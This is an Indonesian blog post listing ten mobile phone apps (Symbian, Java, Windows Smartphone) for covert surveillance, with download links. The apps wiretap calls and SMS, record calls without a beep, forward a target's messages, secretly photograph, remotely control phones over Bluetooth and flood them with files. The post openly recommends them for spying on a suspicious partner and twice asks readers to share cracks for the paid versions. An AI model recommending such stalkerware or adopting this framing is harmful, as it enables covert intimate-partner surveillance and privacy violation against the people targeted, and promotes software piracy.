10 software handphone

Ini ada  10 software handphone yang lumayan keren seperti penyadap jaringan telp dan sms,,, app ini cocok untuk kamu yang kurang percaya dengan pacar kamu,,,atau kamu merasa curiga  sama si dia , he.....he....he.....he....he..... jangan gunakan untuk kejahatan ya friend .....!!!
=====================================
1) Mobile Secuware
Fitur penyadap Mobile Secuware bisa digunaakan untuk memantau pacar atau temen kita lewat fitur Remote Monitoring-nya. Selain itu Aplikasi ini dibekali kemampuan anti maling, jadi kalau hp temen temen pada hilang atau di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
aplikasi nya bisa di download di http://www.mobile-secuware.com   (hati hati banyak virus website!).   


2) Xelnex Lite
Xelnex Lite bisa digunain untuk merekam pembicaraan ditelpon tanpa didahului bunyi 'beep'. jd terjaga kerahasiaaan nya , , sayang nya aplikasi ini masih shareware alias bayar, tapi kita bisa mencoba dengan versi trial nya selama 10 hari dan aplikasi ini kompatibel untuk Symbian S60 3rd edition.
kalau ada yang mau mencoba download saja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx
(ingat di web site banyak virus jadi kalau tidak biasa ...jangan download)
NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

3) Mobile-Spy
Pengguna HP Symbian S60 sudah bisa menggunakan layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dari pc ato hp lain melawati server yg disediakan.
selain Symbian, hp yg berbasis windows Smartphone jg bisa menggunakan aplikasi ani...
sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba download di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari

NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

4) BT Info
Aplikasi yang ini hanya memanfaatkan bluetooth saja, ya jadi sama lah seperti aplikasi2 lainnya. Jika kalau anda yang hendak mencobanya, download di http://en.k508i.wz.cz/jar/ftp_bt_105.jar
NB: Info jg bisa digunakan untuk menggendalikan semua fungsi hp, seperti telpon, kamera, alarm, master reset, sampai matikan hp juga bisa.

5) Call Rrecorder dan AGLAYA Call Magic 

Fungsi nya hanya untuk merekam pembicaraan telpon saja, jika ada yang mau mencoba, download disini aja http://symbianware.com <== utk Call Recorder nya
http://www.aglaya.com/symbian/symbia...call_magic.asp <== utk AGLAYA Call Magic nya

6) TimedSpy
Jika punya hp Symbian S60 v.2 bisa langsung menggungkan tanpa alat tambahan,,
fungsi nya untuk mengintai orang, jadi aplikasi nya melakukan pemotretan lalu hasil nya langsung dikirm seperti ituu...
Jika ada yang mau mencoba, download di http://www.diginaut.com/mobile/archi...edSpyTrial.sis

7) Magic Blue Hack
Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel untuk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
Fitur yang tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
Jika ada yang mau mencoba, download di http://www.getjar.com/products/175782/MagicBlueHack

8) BT Teror
Untuk Jail-jail-an, bisa di download di http://www.symbian-freak.com/downloa...eror_S60v3.zip.
Fungsi nya untuk memanipulasi bluetooth, jadi aplikasi nya untuk mengirim file-file ke hp target terus2an,, jd kaya flooding gitu deh...
Aplikasi ini harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Untuk download Python-nya bisa download di http://sourceforge.net/project/showf...roup_id=154155

9) Mobiscope beta
Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jadi, nanti-nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
kalau ada yang mau mencoba, download di http://www.mobiscope.com/.
dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lagi, aplikasi ini dilengkapi fitur sensor gerak dan scheduler, untuk merekam situasi pada waktu tertentu.

10) SMS Anywhere
SMS Anywhere fungsi nya nge forward semua sms yg dikirim dan diterima ponsel target ke ponsel kita.
kalau ada yg mau mencoba, download di http://www.wireless-labs.com/smsanywhere/

Comments

Popular posts from this blog

SharePoint itu APA Sih....??!

Penyempurnaan DBCC CHECKDB di SQL Server 2008